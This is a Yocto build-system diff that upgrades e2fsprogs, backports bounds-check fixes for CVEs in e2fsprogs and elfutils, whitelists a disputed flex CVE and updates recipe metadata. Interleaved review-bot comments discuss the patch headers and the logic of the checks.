index fc4a540986..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
+++ /dev/null
@@ -1,41 +0,0 @@
1From f6d188580c2c9599319076fee22f2424652c711c Mon Sep 17 00:00:00 2001
2From: Robert Yang <liezhi.yang@windriver.com>
3Date: Wed, 13 Sep 2017 19:55:35 -0700
4Subject: [PATCH] misc/create_inode.c: set dir's mode correctly
5
6The dir's mode has been set by ext2fs_mkdir() with umask, so
7reset it to the source's mode in set_inode_extra().
8
9Fixed when source dir's mode is 521, but tarball would be 721, this was
10incorrect.
11
12Upstream-Status: Submitted
13
14Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
15---
16 misc/create_inode.c | 9 ++++++++-
17 1 file changed, 8 insertions(+), 1 deletion(-)
18
19diff --git a/misc/create_inode.c b/misc/create_inode.c
20index 8ce3faf..50fbaa8 100644
21--- a/misc/create_inode.c
22+++ b/misc/create_inode.c
23@@ -116,7 +116,14 @@ static errcode_t set_inode_extra(ext2_filsys fs, ext2_ino_t ino,
24
25 inode.i_uid = st->st_uid;
26 inode.i_gid = st->st_gid;
27- inode.i_mode |= st->st_mode;
28+ /*
29+ * The dir's mode has been set by ext2fs_mkdir() with umask, so
30+ * reset it to the source's mode
31+ */
32+ if S_ISDIR(st->st_mode)
33+ inode.i_mode = LINUX_S_IFDIR | st->st_mode;
34+ else
35+ inode.i_mode |= st->st_mode;
36 inode.i_atime = st->st_atime;
37 inode.i_mtime = st->st_mtime;
38 inode.i_ctime = st->st_ctime;
39--
402.10.2
41
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
deleted file mode 100644
index de4bce0037..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
+++ /dev/null
@@ -1,57 +0,0 @@
1From 8dd73c149f418238f19791f9d666089ef9734dff Mon Sep 17 00:00:00 2001
2From: Theodore Ts'o <tytso@mit.edu>
3Date: Thu, 19 Dec 2019 19:37:34 -0500
4Subject: [PATCH] e2fsck: abort if there is a corrupted directory block when
5 rehashing
6
7In e2fsck pass 3a, when we are rehashing directories, at least in
8theory, all of the directories should have had corruptions with
9respect to directory entry structure fixed. However, it's possible
10(for example, if the user declined a fix) that we can reach this stage
11of processing with a corrupted directory entries.
12
13So check for that case and don't try to process a corrupted directory
14block so we don't run into trouble in mutate_name() if there is a
15zero-length file name.
16
17Addresses: TALOS-2019-0973
18Addresses: CVE-2019-5188
19Signed-off-by: Theodore Ts'o <tytso@mit.edu>
20
21CVE: CVE-2019-5188
22Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
23Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=8dd73c149f418238f19791f9d666089ef9734dff]
24---
25 e2fsck/rehash.c | 9 +++++++++
26 1 file changed, 9 insertions(+)
27
28diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
29index a5fc1be1..3dd1e941 100644
30--- a/e2fsck/rehash.c
31+++ b/e2fsck/rehash.c
32@@ -160,6 +160,10 @@ static int fill_dir_block(ext2_filsys fs,
33 dir_offset += rec_len;
34 if (dirent->inode == 0)
35 continue;
36+ if ((name_len) == 0) {
37+ fd->err = EXT2_ET_DIR_CORRUPTED;
38+ return BLOCK_ABORT;
39+ }
40 if (!fd->compress && (name_len == 1) &&
41 (dirent->name[0] == '.'))
42 continue;
43@@ -401,6 +405,11 @@ static int duplicate_search_and_fix(e2fsck_t ctx, ext2_filsys fs,
44 continue;
45 }
46 new_len = ext2fs_dirent_name_len(ent->dir);
47+ if (new_len == 0) {
48+ /* should never happen */
49+ ext2fs_unmark_valid(fs);
50+ continue;
51+ }
52 memcpy(new_name, ent->dir->name, new_len);
53 mutate_name(new_name, &new_len);
54 for (j=0; j < fd->num_array; j++) {
55--
562.24.1
57
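diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
new file mode 100644
index 0000000000..34e2567b25
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
@@ -0,0 +1,42 @@
+From a66071ed6a0d1fa666d22dcb78fa6fcb3bf22df3 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 27 May 2022 14:01:50 +0530
+Subject: [PATCH] CVE-2022-1304
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?h=maint&id=ab51d587bb9b229b1fade1afd02e1574c1ba5c76]
+CVE: CVE-2022-1304
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ lib/ext2fs/extent.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/ext2fs/extent.c b/lib/ext2fs/extent.c
+index ac3dbfec9..a1b1905cd 100644
+--- a/lib/ext2fs/extent.c
++++ b/lib/ext2fs/extent.c
+@@ -495,6 +495,10 @@ retry:
+ ext2fs_le16_to_cpu(eh->eh_entries);
+ newpath->max_entries = ext2fs_le16_to_cpu(eh->eh_max);
+
++ /* Make sure there is at least one extent present */
++ if (newpath->left <= 0)
++ return EXT2_ET_EXTENT_NO_DOWN;
++
+ if (path->left > 0) {
+ ix++;
+ newpath->end_blk = ext2fs_le32_to_cpu(ix->ei_block);
+@@ -1630,6 +1634,10 @@ errcode_t ext2fs_extent_delete(ext2_extent_handle_t handle, int flags)
+
+ cp = path->curr;
+
++ /* Sanity check before memmove() */
++ if (path->left < 0)
++ return EXT2_ET_EXTENT_LEAF_BAD;
++
+ if (path->left) {
+ memmove(cp, cp + sizeof(struct ext3_extent_idx),
+ path->left * sizeof(struct ext3_extent_idx));
+--
+2.25.1
+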
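Review bot: The patch header carries only `[PATCH] CVE-2022-1304` as its subject and no description, so the file does not say what the two added checks guard against. Carrying over the subject, body and original author of the upstream commit referenced in `Upstream-Status` would make the backport auditable without leaving the tree. In the code, the first check rejects `newpath->left <= 0` while the second rejects only `path->left < 0`. The difference looks intentional, since the following `if (path->left)` handles zero, but a comment such as `/* left == 0 is valid here: nothing to move */` would make that explicit. Both functions start and end outside their hunks.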
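diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
new file mode 100644
index 0000000000..caeb560d32
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
@@ -0,0 +1,22 @@
+Ensure "small" file systems also have the default inode size (256 bytes) so that
+can store 64-bit timestamps and work past 2038.
+
+The "small" type is any size >3MB and <512MB, which covers a lot of relatively
+small filesystems built by OE, especially when they're sized to fit the contents
+and expand to the storage on boot.
+
+Upstream-Status: Inappropriate
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+diff --git a/misc/mke2fs.conf.in b/misc/mke2fs.conf.in
+index 01e35cf8..29f41dc0 100644
+--- a/misc/mke2fs.conf.in
++++ b/misc/mke2fs.conf.in
+@@ -16,7 +16,6 @@
+ }
+ small = {
+ blocksize = 1024
+- inode_size = 128
+ inode_ratio = 4096
+ }
+ floppy = {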
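Review bot: `Upstream-Status: Inappropriate` is given without the bracketed reason the tag normally carries; something like `Upstream-Status: Inappropriate [oe-core specific]` would record why this default is not sent upstream. The description also drops a word in "so that can store 64-bit timestamps", presumably "so that they can store". The recipe applies this patch only through `SRC_URI_append_class-native`, so a sentence saying that target builds of mke2fs keep the 128-byte default for "small" would save the next reader from checking.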
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
deleted file mode 100644
index 342a2b855b..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
+++ /dev/null
@@ -1,76 +0,0 @@
1From: Wang Shilong <wshilong@ddn.com>
2Date: Mon, 30 Dec 2019 19:52:39 -0500
3Subject: e2fsck: fix use after free in calculate_tree()
4
5The problem is alloc_blocks() will call get_next_block() which might
6reallocate outdir->buf, and memory address could be changed after
7this. To fix this, pointers that point into outdir->buf, such as
8int_limit and root need to be recaulated based on the new starting
9address of outdir->buf.
10
11[ Changed to correctly recalculate int_limit, and to optimize how we
12 reallocate outdir->buf. -TYT ]
13
14Addresses-Debian-Bug: 948517
15Signed-off-by: Wang Shilong <wshilong@ddn.com>
16Signed-off-by: Theodore Ts'o <tytso@mit.edu>
17(cherry picked from commit 101e73e99ccafa0403fcb27dd7413033b587ca01)
18
19Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
20Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=101e73e99ccafa0403fcb27dd7413033b587ca01]
21---
22 e2fsck/rehash.c | 17 ++++++++++++++++-
23 1 file changed, 16 insertions(+), 1 deletion(-)
24
25diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
26index 0a5888a9..2574e151 100644
27--- a/e2fsck/rehash.c
28+++ b/e2fsck/rehash.c
29@@ -295,7 +295,11 @@ static errcode_t get_next_block(ext2_filsys fs, struct out_dir *outdir,
30 errcode_t retval;
31
32 if (outdir->num >= outdir->max) {
33- retval = alloc_size_dir(fs, outdir, outdir->max + 50);
34+ int increment = outdir->max / 10;
35+
36+ if (increment < 50)
37+ increment = 50;
38+ retval = alloc_size_dir(fs, outdir, outdir->max + increment);
39 if (retval)
40 return retval;
41 }
42@@ -637,6 +641,9 @@ static int alloc_blocks(ext2_filsys fs,
43 if (retval)
44 return retval;
45
46+ /* outdir->buf might be reallocated */
47+ *prev_ent = (struct ext2_dx_entry *) (outdir->buf + *prev_offset);
48+
49 *next_ent = set_int_node(fs, block_start);
50 *limit = (struct ext2_dx_countlimit *)(*next_ent);
51 if (next_offset)
52@@ -726,6 +733,9 @@ static errcode_t calculate_tree(ext2_filsys fs,
53 return retval;
54 }
55 if (c3 == 0) {
56+ int delta1 = (char *)int_limit - outdir->buf;
57+ int delta2 = (char *)root - outdir->buf;
58+
59 retval = alloc_blocks(fs, &limit, &int_ent,
60 &dx_ent, &int_offset,
61 NULL, outdir, i, &c2,
62@@ -733,6 +743,11 @@ static errcode_t calculate_tree(ext2_filsys fs,
63 if (retval)
64 return retval;
65
66+ /* outdir->buf might be reallocated */
67+ int_limit = (struct ext2_dx_countlimit *)
68+ (outdir->buf + delta1);
69+ root = (struct ext2_dx_entry *)
70+ (outdir->buf + delta2);
71 }
72 dx_ent->block = ext2fs_cpu_to_le32(i);
73 if (c3 != limit->limit)
74--
752.24.1
76
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
index 4d335af4cf..284ac90196 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
@@ -1,4 +1,4 @@
1From e8331a76983e839a3d193446ab8ae9c1b09daa07 Mon Sep 17 00:00:00 2001 1From b55dfb4b62e507ae4f0814aec7597b56f9d6292a Mon Sep 17 00:00:00 2001
2From: Jackie Huang <jackie.huang@windriver.com> 2From: Jackie Huang <jackie.huang@windriver.com>
3Date: Wed, 10 Aug 2016 11:19:44 +0800 3Date: Wed, 10 Aug 2016 11:19:44 +0800
4Subject: [PATCH] Fix missing check for permission denied. 4Subject: [PATCH] Fix missing check for permission denied.
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
index 95e6a7a2d5..aac88eed98 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
@@ -1,4 +1,4 @@
1From de6d6f0dd010f5b9d917553acb9430278f448f23 Mon Sep 17 00:00:00 2001 1From 9aa68ad81b97847dda3493145f4b0a7cc580c551 Mon Sep 17 00:00:00 2001
2From: Ross Burton <ross.burton@intel.com> 2From: Ross Burton <ross.burton@intel.com>
3Date: Mon, 23 Dec 2013 13:38:34 +0000 3Date: Mon, 23 Dec 2013 13:38:34 +0000
4Subject: [PATCH] e2fsprogs: silence debugfs 4Subject: [PATCH] e2fsprogs: silence debugfs
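diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
index c97c0377e9..279923db8e 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
@@ -8,3 +8,4 @@ rm -f *.tmp
 rm -f *.ok
 rm -f *.failed
 rm -f *.log
+cp ../data/test_data.tmp ./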
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
index 439928e433..565c433866 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
@@ -4,19 +4,17 @@ SRC_URI += "file://remove.ldconfig.call.patch \
4 file://run-ptest \ 4 file://run-ptest \
5 file://ptest.patch \ 5 file://ptest.patch \
6 file://mkdir_p.patch \ 6 file://mkdir_p.patch \
7 file://0001-misc-create_inode.c-set-dir-s-mode-correctly.patch \
8 file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \ 7 file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \
9 file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \ 8 file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \
10 file://CVE-2019-5188.patch \ 9 file://CVE-2022-1304.patch \
11 file://0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch \
12 file://e2fsck-fix-use-after-free-in-calculate_tree.patch \
13 " 10 "
14 11
15SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \ 12SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \
16 file://quiet-debugfs.patch \ 13 file://quiet-debugfs.patch \
14 file://big-inodes-for-small-fs.patch \
17" 15"
18 16
19SRCREV = "984ff8d6a0a1d5dc300505f67b38ed5047d51dac" 17SRCREV = "5403970e44241cec26f98aaa0124b9881b4bbf4f"
20UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+\.\d+(\.\d+)*)$" 18UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+\.\d+(\.\d+)*)$"
21 19
22EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \ 20EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \
@@ -56,6 +54,7 @@ do_install () {
56 oe_multilib_header ext2fs/ext2_types.h 54 oe_multilib_header ext2fs/ext2_types.h
57 install -d ${D}${base_bindir} 55 install -d ${D}${base_bindir}
58 mv ${D}${bindir}/chattr ${D}${base_bindir}/chattr.e2fsprogs 56 mv ${D}${bindir}/chattr ${D}${base_bindir}/chattr.e2fsprogs
57 mv ${D}${bindir}/lsattr ${D}${base_bindir}/lsattr.e2fsprogs
59 58
60 install -v -m 755 ${S}/contrib/populate-extfs.sh ${D}${base_sbindir}/ 59 install -v -m 755 ${S}/contrib/populate-extfs.sh ${D}${base_sbindir}/
61 60
@@ -104,10 +103,12 @@ FILES_libe2p = "${base_libdir}/libe2p.so.*"
104FILES_libext2fs = "${libdir}/e2initrd_helper ${base_libdir}/libext2fs.so.*" 103FILES_libext2fs = "${libdir}/e2initrd_helper ${base_libdir}/libext2fs.so.*"
105FILES_${PN}-dev += "${datadir}/*/*.awk ${datadir}/*/*.sed ${base_libdir}/*.so ${bindir}/compile_et ${bindir}/mk_cmds" 104FILES_${PN}-dev += "${datadir}/*/*.awk ${datadir}/*/*.sed ${base_libdir}/*.so ${bindir}/compile_et ${bindir}/mk_cmds"
106 105
107ALTERNATIVE_${PN} = "chattr" 106ALTERNATIVE_${PN} = "chattr lsattr"
108ALTERNATIVE_PRIORITY = "100" 107ALTERNATIVE_PRIORITY = "100"
109ALTERNATIVE_LINK_NAME[chattr] = "${base_bindir}/chattr" 108ALTERNATIVE_LINK_NAME[chattr] = "${base_bindir}/chattr"
110ALTERNATIVE_TARGET[chattr] = "${base_bindir}/chattr.e2fsprogs" 109ALTERNATIVE_TARGET[chattr] = "${base_bindir}/chattr.e2fsprogs"
110ALTERNATIVE_LINK_NAME[lsattr] = "${base_bindir}/lsattr"
111ALTERNATIVE_TARGET[lsattr] = "${base_bindir}/lsattr.e2fsprogs"
111 112
112ALTERNATIVE_${PN}-doc = "fsck.8" 113ALTERNATIVE_${PN}-doc = "fsck.8"
113ALTERNATIVE_LINK_NAME[fsck.8] = "${mandir}/man8/fsck.8" 114ALTERNATIVE_LINK_NAME[fsck.8] = "${mandir}/man8/fsck.8"
@@ -143,4 +144,7 @@ do_install_ptest() {
143 144
144 install -d ${D}${PTEST_PATH}/lib 145 install -d ${D}${PTEST_PATH}/lib
145 install -m 0644 ${B}/lib/config.h ${D}${PTEST_PATH}/lib/ 146 install -m 0644 ${B}/lib/config.h ${D}${PTEST_PATH}/lib/
147
148 install -d ${D}${PTEST_PATH}/data
149 install -m 0644 ${B}/tests/test_data.tmp ${D}${PTEST_PATH}/data/
146} 150}
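diff --git a/meta/recipes-devtools/elfutils/elfutils_0.178.bb b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
index c500ae3c19..29a3bbfffb 100644
--- a/meta/recipes-devtools/elfutils/elfutils_0.178.bb
+++ b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Utilities and libraries for handling compiled object files"
 HOMEPAGE = "https://sourceware.org/elfutils"
+DESCRIPTION = "elfutils is a collection of utilities and libraries to read, create and modify ELF binary files, find and handle DWARF debug data, symbols, thread state and stacktraces for processes and core files on GNU/Linux."
 SECTION = "base"
 LICENSE = "GPLv2 & LGPLv3+ & GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -33,6 +34,7 @@ SRC_URI = "https://sourceware.org/elfutils/ftp/${PV}/${BP}.tar.bz2 \
  file://0001-ppc_initreg.c-Incliude-asm-ptrace.h-for-pt_regs-defi.patch \
  file://run-ptest \
  file://ptest.patch \
+ file://CVE-2021-33294.patch \
  "
 SRC_URI_append_libc-musl = " \
  file://0001-musl-obstack-fts.patch \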
diff --git a/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
new file mode 100644
index 0000000000..0500a4cf83
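--- /dev/null
+++ b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
@@ -0,0 +1,72 @@
+From 480b6fa3662ba8ffeee274bf0d37423413c01e55 Mon Sep 17 00:00:00 2001
+From: Mark Wielaard <mark@klomp.org>
+Date: Wed, 3 Mar 2021 21:40:53 +0100
+Subject: [PATCH] readelf: Sanity check verneed and verdef offsets in handle_symtab.
+
+We are going through vna_next, vn_next and vd_next in a while loop.
+Make sure that all offsets are sane. We don't want things to wrap
+around so we go in cycles.
+
+https://sourceware.org/bugzilla/show_bug.cgi?id=27501
+
+Signed-off-by: Mark Wielaard <mark@klomp.org>
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=elfutils.git;a=commit;h=480b6fa3662ba8ffeee274bf0d37423413c01e55]
+CVE: CVE-2021-33294
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/ChangeLog | 5 +++++
+ src/readelf.c | 10 +++++++++-
+ 2 files changed, 14 insertions(+), 1 deletion(-)
+
+diff --git a/src/ChangeLog b/src/ChangeLog
+index 6af977e..f0d9e39 100644
+--- a/src/ChangeLog
++++ b/src/ChangeLog
+@@ -1,3 +1,8 @@
++2021-03-03 Mark Wielaard <mark@klomp.org>
++
++ * readelf.c (handle_symtab): Sanity check verneed vna_next,
++ vn_next and verdef vd_next offsets.
++
+ 2019-11-26 Mark Wielaard <mark@klomp.org>
+
+ * Makefile.am (BUILD_STATIC): Add libraries needed for libdw.
+diff --git a/src/readelf.c b/src/readelf.c
+index 5994615..ab7a1c1 100644
+--- a/src/readelf.c
++++ b/src/readelf.c
+@@ -2550,7 +2550,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ &vernaux_mem);
+ while (vernaux != NULL
+ && vernaux->vna_other != *versym
+- && vernaux->vna_next != 0)
++ && vernaux->vna_next != 0
++ && (verneed_data->d_size - vna_offset
++ >= vernaux->vna_next))
+ {
+ /* Update the offset. */
+ vna_offset += vernaux->vna_next;
+@@ -2567,6 +2569,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ /* Found it. */
+ break;
+
++ if (verneed_data->d_size - vn_offset < verneed->vn_next)
++ break;
++
+ vn_offset += verneed->vn_next;
+ verneed = (verneed->vn_next == 0
+ ? NULL
+@@ -2602,6 +2607,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ /* Found the definition. */
+ break;
+
++ if (verdef_data->d_size - vd_offset < verdef->vd_next)
++ break;
++
+ vd_offset += verdef->vd_next;
+ verdef = (verdef->vd_next == 0
+ ? NULL
+--
+2.25.1
+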
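Review bot: The new bounds-check `break` in the verdef walk (readelf.c hunk `@@ -2602,6 +2607,9 @@`) leaves the loop with `verdef` still non-NULL, exactly as the "Found the definition" exit just above it does, so code after the loop cannot tell a match from a rejected offset; the verneed hunk at `@@ -2567,6 +2569,9 @@` has the same shape. The rest of handle_symtab lies outside these hunks, but if it uses the non-NULL pointer as its "found" test, a malformed version section would have the last entry visited reported as the match. Clearing the pointer on the error path avoids that: `if (verdef_data->d_size - vd_offset < verdef->vd_next) { verdef = NULL; break; }`. The unsigned subtraction is also only safe while the current offset is within `d_size`, which presumably holds because the preceding gelf_get* lookup succeeded; a one-line comment stating that invariant next to each check would help the next backporter.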
diff --git a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
index b043c96543..ef5d83ebaf 100644
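--- a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
+++ b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Utility for modifying GPT disk partitioning"
 DESCRIPTION = "GPT fdisk is a disk partitioning tool loosely modeled on Linux fdisk, but used for modifying GUID Partition Table (GPT) disks. The related FixParts utility fixes some common problems on Master Boot Record (MBR) disks."
+HOMEPAGE = "https://sourceforge.net/projects/gptfdisk/"
 
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=59530bdf33659b29e73d4adb9f9f6552"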
diff --git a/meta/recipes-devtools/file/file_5.38.bb b/meta/recipes-devtools/file/file_5.38.bb
index 2d62ead10b..b19bf03986 100644
--- a/meta/recipes-devtools/file/file_5.38.bb
+++ b/meta/recipes-devtools/file/file_5.38.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;beginline=2;md5=0251eaec1188b20d9a72c502ecfdd
11DEPENDS = "file-replacement-native" 11DEPENDS = "file-replacement-native"
12DEPENDS_class-native = "bzip2-replacement-native" 12DEPENDS_class-native = "bzip2-replacement-native"
13 13
14SRC_URI = "git://github.com/file/file.git" 14SRC_URI = "git://github.com/file/file.git;branch=master;protocol=https"
15 15
16SRCREV = "ec41083645689a787cdd00cb3b5bf578aa79e46c" 16SRCREV = "ec41083645689a787cdd00cb3b5bf578aa79e46c"
17S = "${WORKDIR}/git" 17S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/flex/flex_2.6.4.bb b/meta/recipes-devtools/flex/flex_2.6.4.bb
index 1d43d2228a..50d3bf8de1 100644
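--- a/meta/recipes-devtools/flex/flex_2.6.4.bb
+++ b/meta/recipes-devtools/flex/flex_2.6.4.bb
@@ -26,6 +26,11 @@ SRC_URI[sha256sum] = "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c4
 UPSTREAM_CHECK_URI = "https://github.com/westes/flex/releases"
 UPSTREAM_CHECK_REGEX = "flex-(?P<pver>\d+(\.\d+)+)\.tar"
 
+# Disputed - yes there is stack exhaustion but no bug and it is building the
+# parser, not running it, effectively similar to a compiler ICE. Upstream no plans to address
+# https://github.com/westes/flex/issues/414
+CVE_CHECK_WHITELIST += "CVE-2019-6293"
+
 inherit autotools gettext texinfo ptest
 
 M4 = "${bindir}/m4"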
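Review bot: The justification comment above `CVE_CHECK_WHITELIST += "CVE-2019-6293"` rests on an unstated trust assumption, namely that flex only ever reads grammar files the builder controls. The assignment carries no class override, so it silences the report for every variant of the recipe, including any build where flex ends up on a target or in an SDK and that assumption may not hold. I would state the assumption in the comment so the entry gets revisited if usage changes, e.g. `# Only reachable while generating a scanner from a crafted .l file; assumes flex input is trusted.`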
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-Backport-fix-for-PR-tree-optimization-97236-fix-bad-.patch b/meta/recipes-devtools/gcc/gcc-9.3/0001-Backport-fix-for-PR-tree-optimization-97236-fix-bad-.patch
deleted file mode 100644
index dc1039dcc8..0000000000
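--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-Backport-fix-for-PR-tree-optimization-97236-fix-bad-.patch
+++ /dev/null
@@ -1,119 +0,0 @@
-Upstream-Status: Backport [https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=97b668f9a8c6ec565c278a60e7d1492a6932e409]
-Signed-off-by: Jon Mason <jon.mason@arm.com>
-
-From 97b668f9a8c6ec565c278a60e7d1492a6932e409 Mon Sep 17 00:00:00 2001
-From: Matthias Klose <doko@ubuntu.com>
-Date: Tue, 6 Oct 2020 13:41:37 +0200
-Subject: [PATCH] Backport fix for PR/tree-optimization/97236 - fix bad use of
- VMAT_CONTIGUOUS
-
-This avoids using VMAT_CONTIGUOUS with single-element interleaving
-when using V1mode vectors. Instead keep VMAT_ELEMENTWISE but
-continue to avoid load-lanes and gathers.
-
-2020-10-01 Richard Biener <rguenther@suse.de>
-
- PR tree-optimization/97236
- * tree-vect-stmts.c (get_group_load_store_type): Keep
- VMAT_ELEMENTWISE for single-element vectors.
-
- * gcc.dg/vect/pr97236.c: New testcase.
-
-(cherry picked from commit 1ab88985631dd2c5a5e3b5c0dce47cf8b6ed2f82)
----
- gcc/testsuite/gcc.dg/vect/pr97236.c | 43 +++++++++++++++++++++++++++++
- gcc/tree-vect-stmts.c | 20 ++++++--------
- 2 files changed, 52 insertions(+), 11 deletions(-)
- create mode 100644 gcc/testsuite/gcc.dg/vect/pr97236.c
-
-diff --git a/gcc/testsuite/gcc.dg/vect/pr97236.c b/gcc/testsuite/gcc.dg/vect/pr97236.c
-new file mode 100644
-index 000000000000..9d3dc20d953d
---- /dev/null
-+++ b/gcc/testsuite/gcc.dg/vect/pr97236.c
-@@ -0,0 +1,43 @@
-+typedef unsigned char __uint8_t;
-+typedef __uint8_t uint8_t;
-+typedef struct plane_t {
-+ uint8_t *p_pixels;
-+ int i_lines;
-+ int i_pitch;
-+} plane_t;
-+
-+typedef struct {
-+ plane_t p[5];
-+} picture_t;
-+
-+#define N 4
-+
-+void __attribute__((noipa))
-+picture_Clone(picture_t *picture, picture_t *res)
-+{
-+ for (int i = 0; i < N; i++) {
-+ res->p[i].p_pixels = picture->p[i].p_pixels;
-+ res->p[i].i_lines = picture->p[i].i_lines;
-+ res->p[i].i_pitch = picture->p[i].i_pitch;
-+ }
-+}
-+
-+int
-+main()
-+{
-+ picture_t aaa, bbb;
-+ uint8_t pixels[10] = {1, 1, 1, 1, 1, 1, 1, 1};
-+
-+ for (unsigned i = 0; i < N; i++)
-+ aaa.p[i].p_pixels = pixels;
-+
-+ picture_Clone (&aaa, &bbb);
-+
-+ uint8_t c = 0;
-+ for (unsigned i = 0; i < N; i++)
-+ c += bbb.p[i].p_pixels[0];
-+
-+ if (c != N)
-+ __builtin_abort ();
-+ return 0;
-+}
-diff --git a/gcc/tree-vect-stmts.c b/gcc/tree-vect-stmts.c
-index 507f81b0a0e8..ffbba3441de2 100644
---- a/gcc/tree-vect-stmts.c
-+++ b/gcc/tree-vect-stmts.c
-@@ -2355,25 +2355,23 @@ get_group_load_store_type (stmt_vec_info stmt_info, tree vectype, bool slp,
- /* First cope with the degenerate case of a single-element
- vector. */
- if (known_eq (TYPE_VECTOR_SUBPARTS (vectype), 1U))
-- *memory_access_type = VMAT_CONTIGUOUS;
-+ ;
-
- /* Otherwise try using LOAD/STORE_LANES. */
-- if (*memory_access_type == VMAT_ELEMENTWISE
-- && (vls_type == VLS_LOAD
-- ? vect_load_lanes_supported (vectype, group_size, masked_p)
-- : vect_store_lanes_supported (vectype, group_size,
-- masked_p)))
-+ else if (vls_type == VLS_LOAD
-+ ? vect_load_lanes_supported (vectype, group_size, masked_p)
-+ : vect_store_lanes_supported (vectype, group_size,
-+ masked_p))
- {
- *memory_access_type = VMAT_LOAD_STORE_LANES;
- overrun_p = would_overrun_p;
- }
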